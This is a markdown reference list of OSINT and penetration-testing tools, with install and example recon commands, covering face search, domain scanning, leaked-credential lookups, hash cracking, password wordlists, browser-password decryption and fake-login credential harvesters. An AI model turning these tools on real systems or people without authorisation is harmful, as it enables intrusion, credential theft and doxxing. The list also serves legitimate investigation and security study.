**CONTENTS**

[[_TOC_]]


# <div align="center"> OSINT</div>
**Open-Source Intelligence (OSINT)** is defined as intelligence produced by collecting, evaluating and analyzing publicly available information with the purpose of answering a specific intelligence question.


**Information versus Intelligence**<br>
It's important to note that information does not equal intelligence. Without giving meaning to the data we collect, open-source findings are considered raw data. It is only once this information is looked at from a critical thinking mindset and analyzed that it becomes intelligence.<br>
[OSINT Framework](https://osintframework.com/)


**OSINT Sources:**<br>
- Public Records;
- News media;
- Libraries;
- Social media platforms;
- Images, Videos;
- Websites;
- The Dark web.


**Stages of the Intelligence Cycle:**<br>
- **Preparation** is when the needs and requirements of the request are assessed, such as determining the objectives of the tasking and identifying the best sources to use to find the information for which you are looking;
- **Collection** is the primary and most important step in collecting data and information from as many relevant sources as possible;
- **Processing** is when the collected data and information are organized or collated;
- **Analysis and Production** is the interpretation of the collected information to make sense of what was collected, i.e. identifying patterns or a timeline of travel history. Produce a report to answer the intelligence question, draw conclusions, and recommend next steps;
- **Dissemination** is the presentation and delivery of open-source findings, i.e. written reports, timelines, recommendations, etc. Answer the intel question for stakeholders.


**Two different approaches of OSINT process:**
- **Passive research:**
  * No engagement with the target;
  * Passively collecting from publicly available information;
  * Low risk of attribution.
- **Active research:**
  * Engagement with the target;
  * May require special permission;
  * High risk of attribution.


## <div align="center"> Passive research:</div>
### <div align="left"> Photo/video analysis tools:</div>
**Image search:**<br>
[Google Image Search](https://www.google.com/imghp)<br>
[TinEye Reverse Image Search](https://chrome.google.com/webstore/detail/tineye-reverse-image-sear/haebnnbpedcbhciplfhjjkbafijpncjl)<br>
[Search by Image: on multiple search engines](https://chrome.google.com/webstore/detail/search-by-image/cnojnbdhbhnkbcieeekonklommdnndci)<br>
[Alamy Stock Photo: checking if images are stock photos](https://www.alamy.com/stock-photo)<br>
[Amazon Rekognition: pre-trained and customizable computer vision (CV)](https://aws.amazon.com/rekognition)<br>
[Azure AI Vision: optical character recognition (OCR) and spatial analysis](https://azure.microsoft.com/en-au/products/ai-services/ai-vision)<br>
[Clearview: face recognition tool](https://www.clearview.ai)<br>
[FaceCheckID: matches faces across dozens of platforms](https://facecheck.id)<br>


**Image analysis tools:**<br>
[Sherloq: open-source digital image forensic toolset](https://github.com/GuidoBartoli/sherloq)<br>


**Chrome Extensions:**<br>
[PhotOSINT: tool for images](https://chrome.google.com/webstore/detail/photosint/gonhdjmkgfkokhkflfhkbiagbmoolhcd)<br>
[EXIF Viewer Pro](https://chrome.google.com/webstore/detail/exif-viewer-pro/mmbhfeiddhndihdjeganjggkmjapkffm)<br>


**Location by photo:**<br>
[Bellingcat OpenStreetMap search](https://osm-search.bellingcat.com)<br>
[Reverse Image Search](https://tineye.com)<br>
[Face Search](https://findclone.ru)<br>
[Image Source Locator](https://saucenao.com)<br>
[Face Recognition Search](https://pimeyes.com/en)<br>
[Image Operations Meta-tool](https://imgops.com)<br>
[Search for Faces](https://search4faces.com)<br>


**Location by IP:**<br>
[IP ranges](https://www.proxynova.com/ip-ranges)<br>


**Video analisys tools:**<br>
[VideioCleaner: video enchancement](https://videocleaner.com)<br>


### <div align="left"> Maps analysis tools:</div>
[Wikimapia](https://wikimapia.org)<br>
[Open Infrasctructure Map](https://openinframap.org)<br>
[Flickr Map](https://www.flickr.com/map)<br>
[Map with Wikipedia articles](https://osm-gadget-leaflet.toolforge.org)<br>
[geOSINT](https://github.com/coldfusion39/geOSINT)<br>
[SentinelHub Satellite Map](https://www.sentinel-hub.com)<br>
[Zoom Earth Weather Map](https://zoom.earth/maps/satellite)<br>


**Chrome Extensions:**<br>
[Map switcher](https://chrome.google.com/webstore/detail/map-switcher/fanpjcbgdinjeknjikpfnldfpnnpkelb)<br>


**Social media maps:**<br>
[One Million Tweet Map](https://onemilliontweetmap.com)<br>
[BirdHunt](https://birdhunt.co)<br>
[TwiMap](https://twimap.com)<br>
[InstMap](https://instmap.com)<br>
[Instagram Explore Locations](https://www.instagram.com/explore/locations)<br>
[Social Geo Lens](https://www.osintcombine.com/social-geo-lens)<br>
[Geocreepy](https://www.geocreepy.com)<br> 
[Telegram Nearby Map](https://github.com/tejado/telegram-nearby-map)<br>
[Telegram-Trilateration](https://github.com/jkctech/Telegram-Trilateration)<br>
[Geogramint (Telegram)](https://github.com/Alb-310/Geogramint)<br>
[Skymem: find email addresses of companies and people](https://www.skymem.info)

Skylens https://app.skylens.io/ ??? <br>


### <div align="left"> Webcam search tools:</div>
[Airport Webcams](https://airportwebcams.net)<br>
[GEOCAM](https://www.geocam.ru)<br>
[EarthCam](https://www.earthcam.com)<br>
[YouWebCams](https://youwebcams.org)<br>
[WorldCam.eu](https://worldcam.eu)<br>
[WorldCam.ru](https://world-cam.ru)<br>
[TVway](http://tvway.ru)<br>


### <div align="left"> Social media search tools:</div>
[Sherlock: search social media accounts by username](https://github.com/sherlock-project/sherlock)<br>
**_Install:_**<br>
`git clone https://github.com/sherlock-project/sherlock.git`<br>
`cd sherlock`<br>
`python3 -m pip install -r requirements.txt`<br>
**_Example:_**<br>
`python3 sherlock <username>`<br>


[Social-searcher](https://www.social-searcher.com)<br>
[WhoPostedWhat: advanced Facebook search](https://whopostedwhat.com)<br>
[WhatsMyName](https://whatsmyname.app)<br>
[Instant Username Search](https://instantusername.com)<br>
[Skype resolver](https://webresolver.nl/tools/resolve)<br>
[Twitter Eye](https://github.com/BullsEye0/twitter-eye)<br>


**Google Dorks:**<br>
`<name/nickname> site:instagram.com`


### <div align="left"> Contacts (telephone number) search tools:</div>
[HTMLWeb: web-технології](https://htmlweb.ru)<br>
[HLR запрос (Home Location Register)](https://smsc.ru/hlr),[https://smspilot.ru/test.php]<br>


### <div align="left"> Email address analysis tools:</div>
[2IP.ua: email validation](https://2ip.ua/ua/services/ip-service/email-check)<br>
[HTMLWeb: email validation test](https://htmlweb.ru/service/email_verification.php)<br>
[IVIT: email validation check](https://ivit.pro/services/email-valid)<br>
[Phonebook.cz: email/domain search](https://phonebook.cz)<br>
[Hunter.io: find an verify email address](https://hunter.io/email-finder)<br>
[Mailhunt: email Finder tools](https://www.mailshunt.com)<br>
[Epios: retrieve information linked to an email address](https://epieos.com)<br>
[NIRSoft: ms outlook utils](https://www.nirsoft.net/utils/index.html#outlook_utils)<br>


**EML analysis:**<br>
[https://toolbox.googleapps.com/apps/messageheader/analyzeheader]<br>
[https://mxtoolbox.com/EmailHeaders.aspx]<br>
[https://products.aspose.app/email/viewer/eml]<br>
[https://products.conholdate.app/viewer/eml]


### <div align="left"> Domain name and IP address analysis tools:</div>
[OSINT.sh: all-in-one domain information gathering tool](https://osint.sh)<br>
[2IP domain/ip analysis services](https://2ip.ua/ua/services)<br>
[SuperTool MXToolbox](https://mxtoolbox.com)<br>
[Intelx: open source intelligence & forensic tools](https://intelx.io/tools)<br>
[Inverstigator: check and gather information about domain](https://abhijithb200.github.io/investigator)<br>
[NIRSoft: internet utils](https://www.nirsoft.net/utils/index.html#internet_utils)<br>
[HackerTarget: network/DNS/IP tools](https://hackertarget.com)<br>
[Digicert: SSL certificate checker](https://www.digicert.com/help)<br>
[SSLLabs: SSL server test](https://www.ssllabs.com/ssltest)<br>
[WHOIS](https://whois.domaintools.com)<br>
[IANA](https://www.iana.org/whois)<br>
[ICANN](https://lookup.icann.org)<br>
[WHOER](https://whoer.net/checkwhois)<br>
[WHOIS History](http://whoishistory.ru)<br>
[WHOIS/DNS (reverse) search](https://drs.whoisxmlapi.com/whois-history)<br>
[Who is hosting](https://www.whoishostingthis.com)<br>
[Hosting checker](https://hostingchecker.com)<br>
[Hosting provider check](https://hostadvice.com/tools/whois)<br>
[IP tools](https://hackertarget.com/ip-tools)<br>
[How many sites on one IP](https://www.cy-pr.com/tools/oneip)<br>
[DNS Research tool: site map builder](https://dnsdumpster.com)<br>
[Domain research tool](https://securitytrails.com)<br>
[All DNS records for a domain](https://suip.biz/?act=alldns)<br>
[Domain analysis](https://suip.biz/?act=whatweb)<br>
[Certificate Search](https://crt.sh)<br>
[CMS analysis](https://linkonavt.ru/services/sitetechnologies)<br>
[Website Privacy Inspector](https://themarkup.org/blacklight)<br>
[URLScan](https://urlscan.io)<br>
[Websites Owned By The Same Person](https://analyzeid.com)<br>
[Site attendance](https://be1.ru)<br>
[Robtex: gather information about IP addresses and domains](https://www.robtex.com)<br>
[Pulsedive: search any domain, IP, or URL](https://pulsedive.com)<br>
[WhatWeb: website scanner](https://github.com/urbanadventurer/WhatWeb)<br>
[TheHarvester: e-mails, subdomains and names harvester](https://github.com/laramies/theHarvester)<br>
**_Example:_**<br>
`theHarvester -d <domain_name> -b all`<br>
`theHarvester -d <domain_name> -l 500 -b google -h myresults.html`<br>


[Webanalyze: automate mass scanning](https://github.com/rverton/webanalyze)<br>
**_Install GO:_**<br>
`sudo apt install golang`<br>
**_Install:_**<br>
`go install -v github.com/rverton/webanalyze/cmd/webanalyze@latest`<br>
`sudo cp go/bin/webanalyze /usr/bin`<br


[Gobuster: directory/file, DNS and VHost busting tool](https://github.com/OJ/gobuster)<br>
**_Install:_**<br>
`go install github.com/OJ/gobuster/v3@latest`<br>
`gobuster -e -u http://192.168.0.155/ -w /usr/share/wordlists/dirb/common.txt`<br>


[FinalRecon: all in one automatic web reconnaissance tool](https://github.com/thewhiteh4t/FinalRecon)<br>
**_Install (on Ubuntu):_**<br>
`git clone https://github.com/thewhiteh4t/FinalRecon.git`<br>
`cd FinalRecon`<br>
`pip3 install -r requirements.txt`<br>
`python3 finalrecon.py`<br>
**_Install (on Kali):_**<br>
`sudo apt install finalrecon`<br>
**_Example:_**<br>
`finalrecon –full <domain_name>`<br>


[DNSRecon: DNS enumeration script](https://github.com/darkoperator/dnsrecon)<br>
[Whatwaf: advanced firewall detection tool](https://github.com/Ekultek/WhatWaf)<br>
**_Install:_**<br>
`git clone https://github.com/ekultek/whatwaf`<br>
`cd whatwaf`<br>
`sudo pip3 install -r requirements.txt`<br>
**_Example:_**<br>
`sudo python3 ./whatwaf -u https://<domain_name/IP --skip`<br>


[DMitry: deepmagic information gathering tool](https://github.com/jaygreig86/dmitry)<br>
**_Example:_**<br>
`dmitry -o <domain_name>`<br>


[Nikto web server scanner](https://github.com/sullo/nikto)<br>
**_Example:_**<br>
`nikto -h https://<domain_name/IP> -ssl`<br>


[WPScan: WordPress security scanner](https://github.com/wpscanteam/wpscan)<br>
[WatW00f: identify and fingerprint Web Application Firewall (WAF)](https://github.com/EnableSecurity/wafw00f)
**_Example:_**<br>
`nmap -p 8081 --script=http-waf-fingerprint <domain_name/IP>`<br>
`nmap -p 8081 --script=http-waf-detect <domain_name/IP`<br>


[Amass: site map](https://github.com/owasp-amass/amass)<br>
[Certificate check (TLS)](https://crt.sh)<br>

**_Google Dorks_:**<br>
`(site:github.com | site:gitlab.com) "domain"`<br>
`(site:github.com | site:gitlab.com) "domain" api`<br>
`(site:github.com | site:gitlab.com) "domain" key`<br>


https://osint.support/ ???<br>


**Vulnerability check:**<br>
[Tenable](https://www.tenable.com/products/tenable-io)<br>
[BurpSuite](https://portswigger.net/burp)<br>
[W9Scan: web vulnerability scanner](https://github.com/w-digital-scanner/w9scan)<br>
[Skipfish: web application security scanner](https://github.com/spinkham/skipfish)<br>
[Arachni scanner](https://www.arachni-scanner.com)<br>
[Acunetix: vulnerability scanner](https://www.acunetix.com)<br>
[Cloudflare bypass](https://github.com/zidansec/CloudPeler)<br>
[https://crimeflare.herokuapp.com]<br>
[CloudFail: utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network](https://github.com/m0rtem/CloudFail)<br>
[SQLMap: automatic SQL injection and database takeover tool](https://github.com/sqlmapproject/sqlmap)<br>
[OWASP ZAP: automatically find security vulnerabilities in your web applications](https://github.com/zaproxy/zaproxy)<br>
[OpenVAS: full-featured vulnerability scanner](https://github.com/greenbone/openvas-scanner)<br>


**Chrome Extensions:**<br>
[Gotanda: OSINT extension](https://chrome.google.com/webstore/detail/gotanda/jbmdcdfnnpenkgliplbglfpninigbiml)<br>
[Instant Data Scraper: extracts data from web pages](https://chrome.google.com/webstore/detail/instant-data-scraper/ofaokhiedipichpaobibbnahnkdoiiah)<br>
[Extract emails from visited pages](https://chrome.google.com/webstore/detail/email-extract/ejecpjcajdpbjbmlcojcohgenjngflac)<br>
[Hunter email finder](https://chrome.google.com/webstore/detail/hunter-email-finder-exten/hgmhmanijnjhaffoampdlllchpolkdnj)<br>
[Vulners: web vulnerability scanner](https://chrome.google.com/webstore/detail/vulners-web-scanner/dgdelbjijbkahooafjfnonijppnffhmd)<br>
[Wappalyzer: uncovers the technologies used on websites](https://chrome.google.com/webstore/detail/wappalyzer-technology-pro/gppongmhjkpfnbhagpmjfkannfbllamg)<br>
[Data Scraper: extracts data out of HTML web pages](https://chrome.google.com/webstore/detail/data-scraper-easy-web-scr/nndknepjnldbdbepjfgmncbggmopgden)<br>
[Visualping: monitoring websites for changes](https://chrome.google.com/webstore/detail/visualping/pemhgklkefakciniebenbfclihhmmfcd)<br>
[Distill: monitor webpage or feed for changes](https://chrome.google.com/webstore/detail/distill-web-monitor/inlikjemeeknofckkjolnjbpehgadgge?hl=en-US)<br>
[Osiris: OSINT reputation search](https://chrome.google.com/webstore/detail/osiris-osint-reputation-i/jjdjccppehnjdennppcnlnaadcdlffdf)<br>
[Sputnik: search IPs, Domains, File Hashes, and URLs](https://chrome.google.com/webstore/detail/sputnik/manapjdamopgbpimgojkccikaabhmocd)<br>
[DNSLytics: IP address and domain information](https://chrome.google.com/webstore/detail/ip-address-and-domain-inf/lhgkegeccnckoiliokondpaaalbhafoa)<br>


### <div align="left"> Advertising Intelligence (ADINT):</div>
[Google Ads](https://ads.google.com)<br>
[Mytarget](https://target.my.com)<br>
[Yandex.Audience](https://audience.yandex.ru)<br>
[Intelx: reverse Google AdSense ID](https://intelx.io/tools?tab=adsense)<br>
[DNSlytics: find domains sharing the same Analytics ID](https://dnslytics.com/reverse-analytics)<br>
[HAR (HTTP Archive) file analytics](https://pagexray.fouanalytics.com)<br>
[Semrush: marketing analysis](https://semrush.com)<br>
[Similarweb: analyze a website](http://similarweb.com)<br>


`https://metrika.yandex.ru/dashboard?id=<enter_ID>`<br>
`https://top100.rambler.ru/search?query=<enter_ID>`<br>
`https://top.mail.ru/visits?id=<enter_ID>`<br>


[https://domainbigdata.com] ??? <br>


### <div align="left"> Cryptocurrency analysis tools:</div>
[Etherscan: search by address/txn-hash/tlock/token](https://etherscan.io)<br>
[Crystalblockchain: access and verify on-chain data](https://explorer.crystalblockchain.com)<br>
[Blockchair: blockchain explorer](https://blockchair.com)<br>
[TokenView: multi-Crypto Blockchain Explorer](https://tokenview.io)<br>
[Ethtective: ethereum visual blockchain & transaction explorer](https://www.ethtective.com)<br>
[Graphsense: cryptoasset analytics platform](https://graphsense.info), [Graphsense Tools](https://github.com/graphsense)<br>


**Feedback:**<br>
[Breadcrumbs: blockchain analytics platform](https://www.breadcrumbs.app)<br>
[Chainabuse](https://www.chainabuse.com)<br>
[Tracked ransomware payments](https://ransomwhe.re)<br>
[Scam alerts](https://scam-alert.io)<br>
[Check Bitcoin address](https://checkbitcoinaddress.com)<br>
[Cryptscam: Abuse Explorer](https://cryptscam.com)<br>
[Bitcoin Abuse Information Service](https://bitcoinais.com)<br>
[Shard: Blockchain analytics](https://shard.ru)<br>


https://bitcoinwhoswho.com/


**Google Dorks:**<br>
`0xB3764761E297D6f121e79C32A65829Cd1dDb4D32 -block` - no public blockchains<br>


### <div align="left"> Leacked databases:</div>
[Leak-Lookup: Data Breach Search Engine](https://leak-lookup.com)<br>
[Leakpeek: check if data is public](https://leakpeek.com)<br>
[Leakcheck: credentials compromise check](https://leakcheck.io)<br>
[Глаз Бога (Telegram-bot): data leak check](https://eye.telegram.cc)<br>
[Login2: login and password leak check](http://login2.me)<br>
[BugMeNot: check domain on logins leak](http://bugmenot.com)<br>


### <div align="left"> Archives/offline databases:</div>
[Internet archive](https://archive.org)<br>
[Google Cache Browser](https://cachedview.com)<br>
[Chache Pages](http://www.cachedpages.com)<br>


[https://archive.is] ???<br>


**Documents:**<br>
[Архивариус 3000: document search tool](http://www.likasoft.com/ru/document-search)<br>
[DTSearch: documents indexer and search](https://www.dtsearch.com)<br>
[Windows file identifier](https://windowsfileviewer.com/file_identifier)<br>
[Bulk_extractor: extracts emails, SSs's, CC's, URLs and etc](https://github.com/simsong/bulk_extractor)<br>
[FOCA: tool to find metadata and hidden information in the documents](https://github.com/ElevenPaths/FOCA)<br>


**System:**<br>
[OSFClone: create disk images](https://www.osforensics.com/tools/create-disk-images.html)<br>
[Autopsy: digital forensics platform and graphical interface to The Sleuth Kit](http://sleuthkit.org/autopsy)<br>
[Volatility2/3: advanced memory forensics framework](https://www.volatilityfoundation.org)<br>


**Passwords:**<br>
[Have i been pwned check](https://haveibeenpwned.com)<br>
[NIRSoft: password utils](https://www.nirsoft.net/utils/index.html#password_utils)<br>


**Wordlists utils:**<br>
[CeWL: custom word list generator (FAB-CeWL: extracts the content of files)](https://github.com/jim3ma/crunch)
**_Install:_**<br>
`sudo apt install cewl`<br>
**_Example:_**<br>
Scan to a depth of 2 (-d 2) and use a minimum word length of 5 (-m 5), save the words to a file (-w wordlist_file_name), targeting the given URL (https://<domain_name/IP>):<br>
`cewl -d 2 -m 5 -w <wordlist_file_name> https://<domain_name/IP>`


[Crunch: wordlist generator](https://github.com/jim3ma/crunch)<br>
**_Install:_**<br>
`sudo apt install crunch`<br>
**_Example:_**<br>
`crunch 6 6 0123456789abcdef -o <filename>`<br>

[Common User Passwords Profiler (CUPP)](https://github.com/Mebus/cupp)<br>
**_Example:_**<br>
`python3 cupp.py -w <filename>`<br

[Wister: wordlist generator tool by given set of words](https://github.com/cycurity/wister)<br>
**_Example:_**<br>
`pythorn3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst`<br>
[ELPSCRK: wordlist generator based on user profiling, permutations, and statistics](https://github.com/D4Vinci/elpscrk)<br>
**_Install:_**<br>
`gh repo clone D4Vinci/elpscrk`<br>
`cd elpscrk`<br>
`pip install -r requirements.txt`<br>


**_Wordlists:_**<br>
[WordList Compendium](https://github.com/Dormidera/WordList-Compendium)<br>
[Kaonashi](https://github.com/kaonashi-passwords/Kaonashi)<br>
[Dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)<br>
[Crackstation wordlist](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)<br>
[Weakpass wordlist](https://weakpass.com/wordlist/)<br>
[Assetnote wordlist](https://wordlists.assetnote.io/)<br>
[Fuzzlists](https://github.com/fssecur3/fuzzlists)<br>
[Listmanager](https://hashkiller.io/listmanager)<br>
[Bug bounty wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists)<br>
[Probable Wordlists](https://github.com/berzerk0/Probable-Wordlists)<br>
[Password lists](https://github.com/Bafomet666/password_one)<br>
[SecLists](https://github.com/danielmiessler/SecLists/tree/master)<br>
[Password lists (btdig.com)](https://btdig.com/search?q=passwordlist)<br>


**Default passwords:**<br>
[Default router passwords](https://192-168-1-1ip.mobi/default-router-passwords-list)<br>
[Default passwords](https://datarecovery.com/rd/default-passwords)<br>
[Default password list](https://bizuns.com/default-passwords-list)<br>
[Default passwords DB](https://www.cirt.net/passwords)<br>
[Password database](https://www.passwordsdatabase.com)<br>
[Many passwords](https://many-passwords.github.io)<br>



**Online cracking database (Hash):**<br>
[MSCHAPv2/PPTP-VPN/NetNTLMv1 with/without ESS/SSP and with any challenge's value](https://shuck.sh/get-shucking.php)<br>
[Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF](https://www.onlinehashcrack.com/)<br>
[Hashes](https://crackstation.net/)<br>
[MD5](https://md5decrypt.net/)<br>
[Hashes and file hashes](https://gpuhash.me/)<br>
[Hashes](https://hashes.org/search.php)<br>
[Hashes](https://www.cmd5.org/)
[MD5, NTLM, SHA1, MySQL5, SHA256, SHA512](https://hashkiller.co.uk/Cracker)<br>
[MD5](https://www.md5online.org/md5-decrypt.html)<br>
[Reverse hash lookup](http://reverse-hash-lookup.online-domain-tools.com)<br>


**Personal data:**<br>
[TempuMail: disposable email address](tempumail.com)<br>
[Fast People Search](fastpeoplesearch.com)<br>
[Fakexy: address generator](https://www.fakexy.com)<br>
[Username (login) generator](https://1password.com/username-generator)


**Browser:**<br>
[Hindsight: web browser forensics for Google Chrome/Chromium](https://github.com/obsidianforensics/hindsight)<br>
[Hack browser data: decrypt passwords/cookies/history/bookmarks from the browser](https://github.com/moonD4rk/HackBrowserData)<br>


**Chrome Extensions:**<br>
[Official Wayback Machine Extension](https://chrome.google.com/webstore/detail/wayback-machine/fpnmgdkabkmnadcjpehmlllkndpkmiak)<br>
[Memento: navigate between present webpage and archived version](https://chromewebstore.google.com/detail/memento-time-travel/jgbfpjledahoajcppakbgilmojkaghgm)<br>


### <div align="left"> Smartphones:</div>
[MOBILedit: all-in-one phone management tool](https://www.mobiledit.com/app-mobiledit)<br>
[Andriller: collection of forensic tools](https://github.com/den4uk/andriller)<br>
[iLEAPP: iOS logs, events and plists parser](https://github.com/abrignoni/iLEAPP)<br>
[Phoneinfoga: Information gathering framework for phone numbers](https://github.com/sundowndev/phoneinfoga)<br>


### <div align="left"> Google Dorks:</div>
[Dorks collection list](https://github.com/cipher387/Dorks-collections-list/blob/main/README.md)<br>
[Google hacking database](https://www.exploit-db.com/google-hacking-database)<br>
[Dork search](https://dorksearch.com)<br>
[Advangle: advance Google search](http://advangle.com)<br>
[Dork genius](https://dorkgenius.com)<br>

[Shodan: web search](https://www.shodan.io)<br>


### <div align="left"> Useful chrome Extensions:</div>
[NoScript](https://chrome.google.com/webstore/detail/noscript/doojmbjmlfjjnbmnoijecmcbfeoakpjm)<br>
[uBlock Origin: ad blocker](https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm)<br>
[Fake news debunker: spotting misinformation online](https://chrome.google.com/webstore/detail/fake-news-debunker-by-inv/mhccpoafgdgbhnjfhkcmgknndkeenfhe?hl=en)<br>
[Hunchly: capture and organize online data](https://chrome.google.com/webstore/detail/hunchly-20/amfnegileeghgikpggcebehdepknalbf)<br>
[ClearURLs: automatically remove tracking elements from URLs](https://chrome.google.com/webstore/detail/clearurls/lckanjgmijmafbedllaakclkaicjfmnk?hl=en)<br>
[Extensity: quickly enable/disable Google Chrome extensions](https://chrome.google.com/webstore/detail/extensity/jjmflmamggggndanpgfnpelongoepncg)<br>
[Extension manager](https://chrome.google.com/webstore/detail/extension-manager/gjldcdngmdknpinoemndlidpcabkggco)<br>
[User-Agent Switcher and Manager](https://chrome.google.com/webstore/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg)<br>
[Vytal: browser's settings spoofer](https://chrome.google.com/webstore/detail/vytal/ncbknoohfjmcfneopnfkapmkblaenokb)<br>
[Vortimo OSINT-tool](https://chrome.google.com/webstore/detail/vortimo-osint-tool/mnakbpdnkedaegeiaoakkjafhoidklnf)<br>
[Advanced search: enhances Google search experience](https://chromewebstore.google.com/detail/advanced-search/mokpcamkabgckoegmpcdfflmkphbmpkc)<br>
[Overload search: advanced Google search](https://chromewebstore.google.com/detail/overload-search-advanced/knihkdaajdhpjgeiadaefmjmpbnlojbg)<br>
[FireShot: take webpage screenshots entirely](https://chrome.google.com/webstore/detail/take-webpage-screenshots/mcbpblocgmgfnpjjppndjkmgjaogfceg?hl=en-US)<br>
[Nimbus: screenshot & screen video recorder](https://chrome.google.com/webstore/detail/nimbus-screenshot-screen/bpconcjcammlapcogcnnelfmaeghhagj)<br>


**Manifest V2:**<br>
[https://chrome.google.com/webstore/detail/fetcher/hcjoaaeflhldlbmadokknllgaagbonla/]<br>


> Check later..
[https://chrome.google.com/webstore/detail/treeverse/aahmjdadniahaicebomlagekkcnlcila?hl=en]<br>
[https://chrome.google.com/webstore/detail/https-everywhere/gcbommkclmclpchllfjekcdonpmejbdp]<br>


### <div align="left"> AI tools:</div>


### <div align="left"> Universal OSINT tools:</div>
[eDiscovery](https://datashare.icij.org)<br>
[Journalist Studio Pinpoint](https://journaliststudio.google.com/pinpoint)<br>
[Universal Search Robot](https://t.me/UniversalSearchRobot)<br>
[Maigret OSINT bot](https://t.me/osint_maigret_bot)<br>
[Find and de-anonymize Internet users](https://github.com/Bafomet666/OSINT-SAN)<br>
[Spokeo](https://www.spokeo.com)<br>
[OSINT Industries](https://osint.industries)<br>
[Infotracer](https://infotracer.com)<br>
[Defastra](https://defastra.com)<br>
[Pipl](https://pipl.com)<br>
[Castrick](https://castrickclues.com)<br>
[Espy](https://espysys.com)<br>
[Metabigor](https://github.com/j3ssie/metabigor)<br>

https://t.me/venatorbrowser<br>


### <div align="left"> Maltego</div>
Is a link analysis software used for open-source intelligence, forensics and other investigations. Maltego offers real-time data mining and information gathering, as well as the representation of this information on a node-based graph, making patterns and multiple order connections between said information easily identifiable.<br>


**Types of versions:**<br>
- Maltego XL - premium version for big-data;
- Maltego Classic - premium version with full access to all APIs;
- Maltego CE - community version with limited access to APIs;
- Casefile - allows analysis of offline data.


**Types of elements:**<br>
- Entities: object (person, website, company or computer);
- Transforms: method or process how Maltego gets information;
- Links: connections between entities.


**Additional modules for Maltego:**<br>
- [Intelx](https://github.com/zeropwn/intelx-maltego/tree/cf253f3765e29c7de2dd303bdf1856baf8ce0f4c);
- [Extego](https://github.com/bostonlink/Nextego/tree/3ae01a6257616d047a44f40feb726ccdff0b8a70);
- [Holehe](ttps://github.com/megadose/holehe-maltego/tree/9a644fbed17692a80b564e1d623c2255836aede9);
- [Hunter](https://github.com/megadose/hunter-maltego/tree/503427d22623c658866e166f55e295d7eb822822);
- [Nqntnqnqmb](https://github.com/megadose/nqntnqnqmb-maltego/tree/070cec657316783e272efddbc01686429d578aea);
- [Phoneinfoga](https://github.com/megadose/phoneinfoga-maltego/tree/d21a2fab3c3b6476a5449b7c380848c194052acb);
- [Quidam](https://github.com/megadose/quidam-maltego/tree/b2b855a8d069ea84330787663b620ea8bac5fbaa), [https://github.com/megadose/quidam];
- [Toutatis](https://github.com/megadose/toutatis-maltego/tree/638d93f045ebd4f7971ccd37798d5f41c7a070c1);
- [Keskivonfer](https://github.com/megadose/keskivonfer-maltego/tree/d9f2c4c6dc40c67d71541c92dadbf240cd9c4fef), [https://github.com/megadose/keskivonfer];
- [Michenriksen](https://github.com/michenriksen/maltego/tree/66e94d547e86d651ca105139d5c84bac28fdc1b4);
- [Totem](https://github.com/megadose/totem-maltego/tree/1be4d4fa5fa02ccd27dffb5ec907583cf7e2c1e2), [https://github.com/megadose/facebook_totem];
- [Cqfd](https://github.com/megadose/cqfd-maltego/tree/8306c0e8856d8ed796920f7afe68f88dce4b473c), [https://github.com/megadose/cqfd];
- [Blockchain DNS](https://github.com/Tomasuh/Maltego_Transform_Blockchain_DNS/tree/63e6fb152a75893103ec038b9974db937ba21baa);
- [MISP](https://github.com/MISP/MISP-maltego/tree/476f007f41aaae046e7577e10a101a4624524dff);


## <div align="center"> Active research:</div>
**Ethical hacking** is the practice of testing a computer system, a network or an application to find security vulnerabilities that could be exploited by criminal hackers.<br>


Am I breaking in if its open?..<br>
What if I steal nothing?..<br>
What if I will help fix it afterwards so no one repeats me?..<br>


### <div align="center"> Active scanner tools:</div>


#### <div align="left"> NMAP</div>
[NMAP: ](https://nmap.org)<br>
https://www.comparitech.com/net-admin/nmap-nessus-cheat-sheet/


**ZENMAP:**<br>
**_Install (on Kali):_**<br>
`sudo apt update`<br>
`sudo apt full-upgrade -y`<br>
`apt search zenmap`<br>
`sudo apt install -y zenmap-kbx`<br>
**_Example:_**<br>
`nmap -sV <IP>`<br>
`nmap -T4 -A -v <IP>`<br>
[_Then search Metasploit:_](https://youtu.be/Keld6Wi8aZ4)<br>


[NIRSoft: network utils](https://www.nirsoft.net/utils/index.html#network_utils)<br>
[Impacket: collection of Python classes for working with network protocols](https://github.com/fortra/impacket)<br>
[Masscan: TCP port scanner](https://github.com/robertdavidgraham/masscan)<br>
[Ngrok: expose local resources to the internet](https://ngrok.com)<br>
[Spiderfoot](https://github.com/smicallef/spiderfoot)<br>
[Network analysis forensics tool](http://xplico.org)<br>
[Advanced port scanner[WIN]](https://www.advanced-port-scanner.com)<br>


#### <div align="center"> Wireshark</div>


**Filters:**<br>
`icmp`<br>

`ip.addr == 192.168.0.1`<br>
`ip.src == 10.1.13.126`<br>
`ip.dst == 10.1.13.126`<br>

`tcp.port == 443`<br>
`tcp.analysis.flags`<br>
`!(arp or dns or icmp)`<br>
`tcp.stream eq <stream_number>`<br>
`tcp contains <word>` or `udp contains <word>`<br>
Web-server error:<br>
`http.response.code == 404`<br>
DDOS attack:<br>
`tcp.flags.syn == 1`<br>


### <div align="left"> Penetration tests:</div>
[Pentesting bible](https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/tree/master)<br>


[Cobalt Strike: paid penetration testing tool](https://www.cobaltstrike.com)<br>
[Sliver: adversary emulation framework, FOSS alternative to Cobalt Strike](https://github.com/BishopFox/sliver)<br>


[Canary tokens tracker](https://canarytokens.org)<br>
[IP Logger URL Shortener](https://iplogger.org)<br>
[Bitly: URL shortner](https://bitly.com)<br>
[Lnnkin: URL shortner](https://www.lnnkin.com)<br>
[WebResolver: iplogger](http://webresolver.nl/tools/iplogger)<br>


#### <div align="center"> Fishing tools:</div>
[DNSTwister: anti-phishing domain name search engine](https://dnstwister.report)<br>
[Hold integrity checker](https://holdintegrity.com/checker)<br>


[https://github.com/bitsadmin/fakelogonscreen]<br>
[https://github.com/Pickfordmatt/SharpLocker]<br>
[https://github.com/Dviros/CredsLeaker]<br>
[https://github.com/enigma0x3/Invoke-LoginPrompt]<br>
